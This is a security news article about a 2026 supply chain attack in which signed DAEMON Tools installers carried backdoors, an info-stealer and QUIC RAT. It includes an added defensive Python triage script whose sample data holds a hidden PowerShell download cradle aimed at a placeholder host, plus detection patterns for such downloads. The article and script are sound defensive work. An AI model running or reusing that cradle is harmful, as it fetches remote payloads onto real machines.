DAEMON TOOLS supply chain attack ongoing since April, thousands affected [Update]

Security researchers have identified an active supply chain compromise in DAEMON Tools installers impacting users globally since April 2026.

DAEMON TOOLS supply chain attack

Update: Developer AVB Disc Soft confirmed that the incident was caused by unauthorised interference within its build environment, resulting in compromised installation packages being distributed. The company stated that affected files have been removed, internal systems secured, and the build pipeline audited. A new version of DAEMON Tools Lite, version 12.6.0.2445, was released on May 5, 2026, reportedly within 12 hours of the issue being reported at approximately 07:00 GMT, and has been verified as clean. According to the vendor, the issue is now contained, and users downloading the latest version from official sources are no longer at risk.

A major supply chain attack targeting the widely used disk imaging software DAEMON Tools has been uncovered, with malicious installers distributed through official channels since early April 2026. According to findings published by Kaspersky, attackers compromised legitimate installers and embedded backdoors into signed binaries, allowing malware to be delivered under the guise of trusted software updates.

The campaign began on April 8, 2026, when multiple versions of DAEMON Tools (12.5.0.2421 to 12.5.0.2434) were trojanised. The infected installers were hosted on the software’s official website and signed using valid digital certificates belonging to developer AVB Disc Soft. This made the malicious packages appear authentic, significantly increasing the likelihood of successful infection. Researchers say the attack remains active as of early May, with infrastructure still operational.

Several core binaries, including DTHelper.exe, DiscSoftBusServiceLite.exe, and DTShellHlp.exe, were modified to include a hidden backdoor. Once installed, these components execute automatically at system startup and establish communication with an external command-and-control server. The attackers also used a domain designed to resemble the legitimate DAEMON Tools website, further blending malicious activity with normal traffic. The malicious domain was registered just days before the campaign began, suggesting a carefully planned operation.

The attack follows a staged structure. In most cases, infected systems first receive an information-stealing payload that gathers system data such as MAC addresses, hostnames, installed software, running processes, network configuration, and system locale. This information is then sent to attacker-controlled servers and is likely used to profile compromised systems and assess their value for further exploitation. Interestingly, parts of this payload contain Chinese-language strings, hinting at a possible Chinese-speaking threat actor; however, no formal attribution has been made.

Despite thousands of infections observed globally, only a small subset of infected machines received additional malware beyond the initial payload. These higher-value targets were associated with organisations operating in the government, manufacturing, scientific research, and retail sectors. The selective nature of this deployment suggests that the operation was not purely opportunistic, but instead involved targeted objectives consistent with espionage or strategic intrusion activity.

Among the second-stage tools identified was a minimalistic backdoor capable of executing commands, downloading files, and running code directly in memory. In at least one confirmed case, a more advanced implant known as QUIC RAT was deployed. This malware supports multiple communication protocols, including HTTP, TCP, DNS, and QUIC, and can inject code into legitimate processes such as notepad.exe.

Telemetry data shows thousands of infection attempts across more than 100 countries. The highest number of affected systems was recorded in Russia, Brazil, Turkey, Spain, Germany, France, Italy, and China. Around ten percent of affected systems belonged to organisations, while most systems only received the initial data-collection stage.

Security tools from Kaspersky reportedly detect the malicious activity at multiple stages, including suspicious PowerShell-based downloads, malware execution from temporary directories, code injection into legitimate processes, and unusual outbound network traffic. Organisations are advised to carry out audits of systems where DAEMON Tools was installed after April 8, 2026. It is also recommended to monitor systems for unusual command-line activity, particularly involving PowerShell. In addition, organisations are encouraged to implement zero-trust security models and restrict execution from temporary directories.
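The audit and monitoring advice above boils down to two checks a defender can script: which installs fall in the trojanised version range (12.5.0.2421 to 12.5.0.2434) or were installed on or after April 8, 2026 and are older than the verified-clean 12.6.0.2445 build, and which endpoint events match the behaviours named in the article (PowerShell downloads, execution from temporary directories, injection into notepad.exe). The following is an added example, not code from Kaspersky, AVB Disc Soft or the article. The inventory rows and process events are constructed sample data, the `host`, `image`, `command_line`, `target_image` and `kind` field names are assumptions rather than any product's export format, and the version `12.4.0.2400` is a made-up older build used only to exercise the date rule.

```python
"""Triage helpers for the DAEMON Tools compromise described above.

Added example, not vendor or researcher code. Field names and sample
rows are constructed for illustration.
"""
from datetime import date

# Version range the article reports as trojanised, inclusive.
TROJANISED_MIN = (12, 5, 0, 2421)
TROJANISED_MAX = (12, 5, 0, 2434)
# First build the vendor describes as verified clean.
CLEAN_FROM = (12, 6, 0, 2445)
# Date the article gives for the start of the campaign.
CAMPAIGN_START = date(2026, 4, 8)

# Command-line fragments typical of PowerShell-based downloads.
PS_DOWNLOAD_MARKERS = ("downloadstring", "downloadfile", "invoke-webrequest",
                       "iwr ", "net.webclient", "start-bitstransfer")
# Temporary directories the article recommends restricting execution from.
TEMP_DIRS = ("\\appdata\\local\\temp\\", "\\windows\\temp\\")


def parse_version(text: str) -> tuple:
    """'12.5.0.2430' -> (12, 5, 0, 2430); missing components count as 0."""
    parts = [int(p) for p in text.strip().split(".") if p]
    return tuple(parts + [0] * (4 - len(parts)))[:4]


def triage_install(version: str, installed_on: date) -> str:
    """Classify one DAEMON Tools install.

    'affected': version inside the reported trojanised range.
    'review'  : outside the range but installed on/after the campaign start
                and older than the verified-clean build, so the installer
                source cannot be assumed safe and the host needs an audit.
    'clean'   : verified-clean build, or an older build installed before
                the campaign began.
    """
    v = parse_version(version)
    if TROJANISED_MIN <= v <= TROJANISED_MAX:
        return "affected"
    if v >= CLEAN_FROM:
        return "clean"
    if installed_on >= CAMPAIGN_START:
        return "review"
    return "clean"


def triage_inventory(rows: list) -> dict:
    """Map host name -> triage verdict for an inventory export."""
    return {r["host"]: triage_install(r["version"], r["installed"]) for r in rows}


def flag_process_event(event: dict) -> list:
    """Return the behaviours an endpoint event matches (empty means nothing notable).

    Assumed keys: kind ('process_create' or 'remote_thread'), image,
    command_line, target_image (for remote_thread events).
    """
    hits = []
    image = event.get("image", "").lower()
    cmd = event.get("command_line", "").lower()
    target = event.get("target_image", "").lower()
    basename = image.rsplit("\\", 1)[-1]
    if basename in ("powershell.exe", "pwsh.exe") and any(m in cmd for m in PS_DOWNLOAD_MARKERS):
        hits.append("powershell_download")
    if any(t in image for t in TEMP_DIRS):
        hits.append("exec_from_temp")
    if event.get("kind") == "remote_thread" and target.endswith("\\notepad.exe"):
        hits.append("injection_into_notepad")
    return hits


# Constructed sample inventory (hosts, dates and 12.4.0.2400 are made up).
SAMPLE_INVENTORY = [
    {"host": "ws-001", "version": "12.5.0.2430", "installed": date(2026, 4, 20)},
    {"host": "ws-002", "version": "12.6.0.2445", "installed": date(2026, 5, 6)},
    {"host": "ws-003", "version": "12.4.0.2400", "installed": date(2026, 4, 15)},
    {"host": "ws-004", "version": "12.4.0.2400", "installed": date(2026, 2, 1)},
]

# Constructed sample endpoint events; example.invalid is a reserved placeholder.
SAMPLE_EVENTS = [
    {"kind": "process_create",
     "image": "C:\\Windows\\System32\\WindowsPowerShell\\v1.0\\powershell.exe",
     "command_line": "powershell -nop -w hidden -c \"(New-Object Net.WebClient).DownloadString('http://example.invalid/p')\""},
    {"kind": "process_create", "image": "C:\\Users\\alice\\AppData\\Local\\Temp\\svc.exe",
     "command_line": "svc.exe"},
    {"kind": "remote_thread", "image": "C:\\Users\\alice\\AppData\\Local\\Temp\\svc.exe",
     "target_image": "C:\\Windows\\System32\\notepad.exe"},
    {"kind": "process_create", "image": "C:\\Program Files\\DAEMON Tools Lite\\DTHelper.exe",
     "command_line": "DTHelper.exe"},
]

if __name__ == "__main__":
    for host, verdict in triage_inventory(SAMPLE_INVENTORY).items():
        print(f"{host}: {verdict}")
    for ev in SAMPLE_EVENTS:
        print(ev["image"], "->", flag_process_event(ev) or "-")
```

The version rule is deliberately conservative: a build outside the published range that was installed after the campaign start is marked for review rather than clean, because the article's recommendation is to audit every system where the software was installed after that date, not only those running the listed versions. The event heuristics are coarse by design and meant as a starting point for hunting, so expect benign hits (administrative PowerShell, installers unpacking to Temp) that need triage.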

The DAEMON Tools compromise demonstrates how attackers continue to refine supply chain tactics, combining large-scale distribution with precise targeting. With trusted software increasingly becoming an entry point for advanced threats, organisations must treat even legitimate applications as potential risk vectors and adopt layered, proactive defence strategies.
